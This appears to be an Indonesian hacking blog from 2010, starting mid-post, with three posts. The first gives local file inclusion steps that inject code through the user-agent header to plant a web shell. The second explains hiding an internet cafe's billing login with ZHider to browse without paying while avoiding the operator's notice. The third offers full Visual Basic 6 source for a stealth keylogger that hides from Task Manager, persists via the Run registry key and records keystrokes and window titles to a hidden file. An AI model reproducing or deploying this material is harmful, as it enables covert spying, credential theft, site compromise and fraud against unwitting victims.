SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :

atau

lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.php
happy hacking !

sumber: http://www.ilmuwebsite.com

Selasa, 22 Juni 2010

Bermain Warnet Gratis

Loe Pada Mao Maen Warnet Gratisan?
Yuk Maen Warnet Gratis , Gratisan Maen Di warnet Yok Boy, Tapi Gimana Caranye? Pusing Gw ni Gak Punya Duit! Warnet Gratis Dimana Ya?
PUSING LOE KAN?? Ni Deh Gw Kasi Caranya, dapet dari nyari nyari juga ni:
Heey semuanyaaa! Berjumpa lagi dengan sayaa di tips dan trik! Hahahaaa… Di trik dan tips kali ini aku mau ngejelasin trik tips mengakali warnet dengan menggunakan ZHider! Di sini kita bakalan mencoba berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini. Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet.

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!
Berikut ini langkahnyaaa:
  1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
  2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
  3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
  4. Klo ada login screen, kamu login ajah kaya biasa.
  5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
  6. Klo ZHider dah dibukaa, langsung ajah logout.
  7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
  8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
  9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
  10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
  11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
  12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!
Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).
Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…
Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

Senin, 21 Juni 2010

Keylogger – Keylogging

berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.
Yang perlu diperhatikan :
1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:
(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)
3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)
4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig
5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad
6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(
======= code mulai ==========================
‘simpan file hasil compile dg nama regsvc32.exe
‘form
‘simpan dg nama FRMLOG.frm
Option Explicit
Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long
Private sAppName As String
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Const RSP_SIMPLE_SERVICE = 1
Private Const RSP_UNREGISTER_SERVICE = 0
Private Const VK_BACK = &H8
Private Const VK_CONTROL = &H11
Private Const VK_SHIFT = &H10
Private Const VK_TAB = &H9
Private Const VK_RETURN = &HD
Private Const VK_MENU = &H12
Private Const VK_ESCAPE = &H1B
Private Const VK_CAPITAL = &H14
Private Const VK_SPACE = &H20
Private Const VK_SNAPSHOT = &H2C
Private Const VK_UP = &H26
Private Const VK_DOWN = &H28
Private Const VK_LEFT = &H25
Private Const VK_RIGHT = &H27
Private Const VK_MBUTTON = &H4
Private Const VK_RBUTTON = &H2
Private Const VK_LBUTTON = &H1
Private Const VK_PERIOD = &HBE
Private Const VK_COMMA = &HBC
Private Const VK_NUMLOCK = &H90
Private Const VK_NUMPAD0 = &H60
Private Const VK_NUMPAD1 = &H61
Private Const VK_NUMPAD2 = &H62
Private Const VK_NUMPAD3 = &H63
Private Const VK_NUMPAD4 = &H64
Private Const VK_NUMPAD5 = &H65
Private Const VK_NUMPAD6 = &H66
Private Const VK_NUMPAD7 = &H67
Private Const VK_NUMPAD8 = &H68
Private Const VK_NUMPAD9 = &H69
Private Const VK_F9 = &H78
Private Const VK_F8 = &H77
Private Const VK_F7 = &H76
Private Const VK_F6 = &H75
Private Const VK_F5 = &H74
Private Const VK_F4 = &H73
Private Const VK_F3 = &H72
Private Const VK_F2 = &H71
Private Const VK_F12 = &H7B
Private Const VK_F11 = &H7A
Private Const VK_F10 = &H79
Private Const VK_F1 = &H70
Private Sub LoadTextFile()
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & “settings.ini” For Input As #1
Line Input #1, sAppName
Close
Else
Open App.Path & “\settings.ini” For Input As #1
Line Input #1, sAppName
Close
End If
If sAppName = vbNullString Then
sAppName = “regsvc32″
End If
Exit Sub
dlgerror:
sAppName = “regsvc32″
End Sub
Private Sub SAVEDLL()
Dim nSaveLocation As String
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & sAppName & “.dll” For Append As #1
nSaveLocation = App.Path & sAppName & “.dll”
GoTo READY
Else
Open App.Path & “\” & sAppName & “.dll” For Append As #1
nSaveLocation = App.Path & “\” & sAppName & “.dll”
GoTo READY
End If
READY:
If txtLOGGED.Text = vbNullString Then
Exit Sub
End If
Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf
Close
Close
Close
SetAttr nSaveLocation, vbHidden
Exit Sub
dlgerror:
Err.Clear
Exit Sub
End Sub
Private Sub Form_Load()
On Error Resume Next
Call LoadTextFile
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = sAppName
ENTERREGISTRY
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub ENTERREGISTRY()
Dim nKey As Long
RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey
If Len(App.Path) <= 3 Then
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)
Else
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = True
Call SAVEDLL
ENTERREGISTRY
Unload Me
End
End Sub
Private Sub tmrCAPTION_Timer()
On Error Resume Next
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = False
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub tmrLOG_Timer()
On Error Resume Next
Dim nKey, nChar As Integer
Dim nText As String
For nChar = 1 To 255
nKey = GetAsyncKeyState(nChar)
If nKey = -32767 Then
nText = Chr(nChar)
If nChar = VK_BACK Then
nText = ” {B.S} ”
ElseIf nChar = VK_CONTROL Then
nText = ” {CTRL} ”
ElseIf nChar = VK_SHIFT Then
nText = ” {SHIFT} ”
ElseIf nChar = VK_TAB Then
nText = ” {TAB} ”
ElseIf nChar = VK_RETURN Then
nText = ” {ENTER} ”
ElseIf nChar = VK_MENU Then
nText = ” {ALT} ”
ElseIf nChar = VK_ESCAPE Then
nText = ” {ESC} ”
ElseIf nChar = VK_CAPITAL Then
nText = ” {CAPS} ”
ElseIf nChar = VK_SPACE Then
nText = ” {SP.B} ”
ElseIf nChar = VK_UP Then
nText = ” {UP} ”
ElseIf nChar = VK_LEFT Then
nText = ” {LEFT} ”
ElseIf nChar = VK_RIGHT Then
nText = ” {RIGHT} ”
ElseIf nChar = VK_DOWN Then
nText = ” {DOWN} ”
ElseIf nChar = VK_F1 Then
nText = ” {F1} ”
ElseIf nChar = VK_F2 Then
nText = ” {F2} ”
ElseIf nChar = VK_F3 Then
nText = ” {F3} ”
ElseIf nChar = VK_F4 Then
nText = ” {F4} ”
ElseIf nChar = VK_F5 Then
nText = ” {F5} ”
ElseIf nChar = VK_F6 Then
nText = ” {F6} ”
ElseIf nChar = VK_F7 Then
nText = ” {F7} ”
ElseIf nChar = VK_F8 Then
nText = ” {F8} ”
ElseIf nChar = VK_F9 Then
nText = “{F9}”
ElseIf nChar = VK_F10 Then
nText = ” {F10} ”
ElseIf nChar = VK_F11 Then
nText = ” {F11} ”
ElseIf nChar = VK_F12 Then
nText = ” {F12} ”
ElseIf nChar = VK_SNAPSHOT Then
nText = ” {PRINT SCRN} ”
ElseIf nChar = VK_RBUTTON Then
nText = ” {R.B} ”
ElseIf nChar = VK_LBUTTON Then
nText = ” {L.B} ”
ElseIf nChar = VK_MBUTTON Then
nText = ” {M.B} ”
ElseIf nChar = VK_PERIOD Then
nText = “.”
ElseIf nChar = VK_COMMA Then
nText = “,”
ElseIf nChar = VK_NUMLOCK Then
nText = ” {NUMLCK} ”
ElseIf nChar = VK_NUMPAD0 Then
nText = “0″
ElseIf nChar = VK_NUMPAD1 Then
nText = “1″
ElseIf nChar = VK_NUMPAD2 Then
nText = “2″
ElseIf nChar = VK_NUMPAD3 Then
nText = “3″
ElseIf nChar = VK_NUMPAD4 Then
nText = “4″
ElseIf nChar = VK_NUMPAD5 Then
nText = “5″
ElseIf nChar = VK_NUMPAD6 Then
nText = “6″
ElseIf nChar = VK_NUMPAD7 Then
nText = “7″
ElseIf nChar = VK_NUMPAD8 Then
nText = “8″
ElseIf nChar = VK_NUMPAD9 Then
nText = “9″
End If
txtLOGGED.Text = txtLOGGED.Text + nText
End If
Next
Call GetActiveWindowName
End Sub
Private Sub tmrSAVE_Timer()
Call SAVEDLL
txtLOGGED.Text = vbNullString
txtENUMERATE.Text = vbNullString
End Sub
====code end ===========
============code mulai ============
‘module visual basic
‘simpan dg nama mdlActiveWindow.bas
Option Explicit
Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetForegroundWindow Lib “user32″ () As Long
Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public nCAPTION As String
Public nTESTER As Long
Public nClass As String
Public Sub GetActiveWindowName()
nCAPTION = Space(256)
nClass = Space(256)
GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)
GetClassName GetForegroundWindow, nClass, Len(nClass)
If nTESTER = GetForegroundWindow Then Exit Sub
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass
nTESTER = GetForegroundWindow
End Sub
============= code end =============
/* ——————————|EOF|—————————— */

Selamat Mencoba